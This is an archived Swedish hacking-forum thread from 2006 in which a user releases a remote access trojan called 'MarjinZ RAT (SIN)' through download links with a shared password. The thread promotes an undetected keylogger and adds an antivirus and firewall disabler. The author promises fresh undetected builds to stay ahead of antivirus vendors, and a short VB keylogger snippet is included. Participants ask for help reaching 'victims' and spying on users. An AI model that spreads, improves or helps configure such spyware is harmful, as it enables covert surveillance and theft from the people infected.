Help - Search - Members - Calendar
Full Version: MarjinZ RAT (SIN)
SweRAT > Datasäkerhet > Projekt och Releaser
Pages: 1, 2
marjinz
Okej grabbar (om inte tjejer), tänkte dela med mig av min (ofullständiga) RAT.

Och NEJ, detta är inte en super rat som i Poison Ivys klass eller andra. RATen är inte färdig och har inte många funktioner alls.

Keyloggern kan man kanske vara glad över och speciellt att den är UD. Skulle också sitta perfekt om alla kunde hålla låg profil.

Måste också få säga att det är mycket roligt att programmera dessa "leksaker".


v1.3 : http://eazyshare.net/files/36/1.3.rar

V1.2 : http://eazyshare.net/files/36/1.2.RAR

V1.1 : http://eazyshare.net/files/36/1.1.RAR

password : swerat
Codius
Jag skrev ett program för ett tag sedan för att dumpa winsck.ocx tillsammans med önskad fil, var inte svårt att göra men rätt effektivt, även om filen vart stoor..
Caecigenus
VB tihi...
ksv
Tack för bidraget!
Alltid trevligt med fler RATs! smile.gif
marjinz
Mitt nöje biggrin.gif
crazyboris
QUOTE(marjinz @ May 7 2006, 12:44) *
Mitt nöje biggrin.gif

och vårat.... wink.gif
Metsys
Den funkar ju inte ??
Andvare
QUOTE(Metsys @ 2006-05-08 17:54) *
Den funkar ju inte ??

Du får nog ta och ge lite mer information. På vilket sätt fungerar den inte?
Metsys
QUOTE(Metsys @ 2006-05-08 14:54) *
Den funkar ju inte ??


Jo men jag får inte keyloggern att funka!
Chatten och meddelandet funkar primus =D

Tak så mkt
crazyboris
måste prova ...
marjinz
Det är sant! Jag har glömt backstage tangenten (keylogger). Ursäkta mig! biggrin.gif
Klienten krashar när en odeinierad tangent skickas från servern.
Dne här lilla koden skulle jag ha pressat in i servern.


PressedKey = GetAsyncKeyState(17)
If PressedKey = -32767 Then
KeyToSend = "[BACK]"
GoTo KeyFound
End If



Älskar feedback! biggrin.gif Peppra på med det.
B0mb
QUOTE(marjinz @ 2006-05-08 18:12) *
Det är sant! Jag har glömt backstage tangenten (keylogger). Ursäkta mig! biggrin.gif
Klienten krashar när en odeinierad tangent skickas från servern.
Dne här lilla koden skulle jag ha pressat in i servern.
PressedKey = GetAsyncKeyState(17)
If PressedKey = -32767 Then
KeyToSend = "[BACK]"
GoTo KeyFound
End If
Älskar feedback! biggrin.gif Peppra på med det.



ny other download link plz?
marjinz
Get it here : http://eazyshare.net/files/36/1.3.rar
Orbitaljl
Väldigt snygg rat marjinz, bra jobbat ! smile.gif
Det finns en sak som jag stör mig lite på & det är färgerna,
Tycker det är lite jobbiga färger bara.
Annars är den helt okej biggrin.gif
marjinz
Sant! tongue.gif . Har definitivt ingen känsla för design biggrin.gif


PS: Någon som tycker att jag ska lägga till en AV+FW disabler/enabler-funktion?
Metsys
Har filen försvunnit från servern? funkade ju förut efter två klick inte nu

EDIT

Funkade nu
RM1212
Jag håller med Orbitaljl Färgerna är väldigt störande. Annras har du gjort ett bra jobb med designen.
marjinz
Någon som tycker att jag ska lägga till en Disable/Enable AVs/FWs-funktion?
hnZ^
Kan vara bra att ha, men gör den valbar i serverbuildern i sådana fall smile.gif
marjinz
RAT uppdaterad v1.1!

Ny funktion har laggts till (AW/FW disabler) i server buildern.
AW/FW kan också aktiveras/inaktiveras efter server installation. (Commands-Commands-Other)

Ganska effektiv "disabler"! Själv har man KAV som inaktiverades/aktiverades utan problem. Korrupterar inga filer heller.

hämta här: http://eazyshare.net/files/36/1.3.rar

OBS: Håll utkik efter nya versioner. Tänker jävlas med Anit-virus företagen lite biggrin.gif. Skulle servern bli detected så kommer
jag med en ny UD. wink.gif
davve
QUOTE(marjinz @ 2006-05-10 21:36) *
OBS: Håll utkik efter nya versioner. Tänker jävlas med Anit-virus företagen lite biggrin.gif. Skulle servern bli detected så kommer
jag med en ny UD. wink.gif

gulligt av dig, men jobba inte söder dig på det nu. måste väl finnas nån fiffig feature kvar att implementera.
Metsys
Vore jävligt skönt ifall du kunde slänga in nåt så man kunde ändra ikonen till det man vill
marjinz
QUOTE(Metsys @ 2006-05-10 21:37) *
Vore jävligt skönt ifall du kunde slänga in nåt så man kunde ändra ikonen till det man vill


Lägger till det på nästa verison
B0mb
m8 m not able 2 download it from http://medlem.spray.se/marjinz1/SIN.zip
giv me sum other download link plz huh.gif
marjinz
Copy this link: hxxp://medlem.spray.se/marjinz1/SIN.zip and paste it in the search field and go to the url. If you get an error message then try to paste it again and enter the url.
marjinz
Då va jag snart klar med Winsock API, vilket innebär att ni inte behöver binda mswinsck.ocx med servern biggrin.gif

De nya inställningarna kommer med nästa version wink.gif
B0mb
this is wot i m getting when m trying it again n again.
marjinz
Wait for the new version!

I'll release it soon and give you a new download url. wink.gif


Take a look: http://www.megasecurity.org/trojans/m/marj...inzratbeta.html

btw hmm this RAT was my first and it's a noob RAT, LOL!!!
marjinz
MarjinZ RAT 1.2 released and here are the new download urls!



V 1.1 : http://ez-files.net/download.php?file=1957...3b5382cf4d7a873
password : swerat



V 1.2 : http://ez-files.net/download.php?file=09cf...9bcebe6cf978562

EDIT: Keylogger fixed!

password : swerat
B0mb
finally i downloaded Sin for your rat thanx blind..

n thanx to u too marjinz for releasing this new version
B0mb
man it's not working for me... i am able to make a connection but none of d comand is excuting except msg one..keylogger too dosnt works for me..& m getting an error like

Run-time error '40006'
wrong protocol or connection state for the requested trascation or request
ny help plz
marjinz
You can't connect to yourself (if you're trying).
Are u using v1.2?
B0mb
yeah! champ!
u right m trying to connect my self..n also usin 1.2...
i was doin so to assure myself dat it's work fine...so dat i can spy on my användare ...lol
Metsys
Jag får en error på min bärbara dator "Runtime error 75 path/file access error"
Men den funkar på min stationära prima =)
Några förslag vad det kan vara?
marjinz
Servern eller Klienten?
Om det gäller Klienten så får du inte ha något program igång som använder sig av mswinsock.ocx, mscomctl.ocx eller comdlg32.ocx

OBS: Detta skall åtgärads, så håll utkik efter nyare versioner.
Slurken
heja marjinz
marjinz
Släpper nu 1.3!
Fortfarande UD och hoppas att den förblir det ett bra tag till. wink.gif

Hämtas här: http://eazyshare.net/files/36/1.3.rar
milo
Hej o tack för en ny UD rat.För mig funkar 1.2 bra men 1.3 får ja felmeddelanden på.Vilket program kan tänkas använda mscomctl.ocx för där ligger felet.Får även fel på 1.2 med keyloggern.Ville bara tacka för att du delar med dig av en UD rat.Hoppas på en fortsättning av den här
marjinz
En ny snabb uppdatering (lagt till lite fler funktioner + fixed bug).

http://eazyshare.net/files/36/1.3.rar

password: swerat
Orbitaljl
det ser fin fint ut.
gillar redan dom nya färgerna, bra jobbat!
snart är det ju en super rat som bifrost ^^
marjinz
Vill säga till er alla där hemma att man leker inte med ksv:s mjukvaror (tex Bifrost). Hans Bifrost är hur bra som helst och min RAT kan inte jämföras med hans på något sätt, bara reverse-connection.

Men hur som helst, så tänker jag fortsätta på min RAT och lägga till lite fler funktioner som Filemanager, screencapture, Webcam-capture, rootkit och annat smått o gott.
B0mb
hey! marjinz i got a dynamic Ip address..now how to configure sever so that i can get my vicitm on to my machine?
B0mb
Overall ur Rat is Gud...but if posibl try to add Remote screen capture utility too...
thanx
marjinz
I'll add more options later within a new version
syndig
Fint jobbat marjinz, gillar den verkligen =)

hoppas dock på mer features i framtiden
stenen
Jepp, verkligen bra jobbat! Allt funkade bra för mig, så jag är tacksam smile.gif
syndig
Jag hittade inget heller som inte fungerat som det ska.

Tyvärr saknas det ju som sagt lite småsaker men du har ju tid på dig att utveckla detta till en riktigt bra rat
marjinz
Ska släppa en ny RAT inom kort. Liknar Bifrost och Poison Ivy till liten del och ska vara mycket bättre än denna just nu. Håll utkik wink.gif
syndig
Det kommer jag verkligen att göra =)
Gillade PI ordentligt så den leker jag med för tillfället.
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.
Invision Power Board © 2001-2012 Invision Power Services, Inc.